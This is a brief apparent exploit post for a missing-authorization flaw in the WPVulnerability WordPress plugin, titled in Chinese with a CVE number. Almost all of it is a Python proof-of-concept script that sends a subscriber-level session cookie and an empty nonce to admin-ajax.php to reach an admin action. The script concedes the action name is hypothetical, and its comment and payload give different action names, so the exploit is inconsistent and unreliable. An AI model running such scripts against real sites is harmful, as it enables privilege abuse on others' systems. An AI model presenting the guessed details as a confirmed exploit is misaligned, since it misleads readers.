CVE-2026-24376 WPVulnerability插件权限绕过漏洞

import requests # Exploit Title: WPVulnerability < 4.2.1 - Missing Authorization PoC # Description: Low-privileged users can access admin functionality due to missing capability checks. target_url = "http://target.com/wp-admin/admin-ajax.php" # Attacker cookies with low privileges (Subscriber level) cookies = { "wordpress_logged_in_xxx": "low_priv_user_session_id" } # Data payload simulating the vulnerable action # The specific action 'wpvuln_db_check' is hypothetical based on plugin naming conventions payload = { "action": "wpvulnerability_check", "nonce": "" } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text) else: print("[-] Failed to send request.") except Exception as e: print(f"[-] Error: {e}")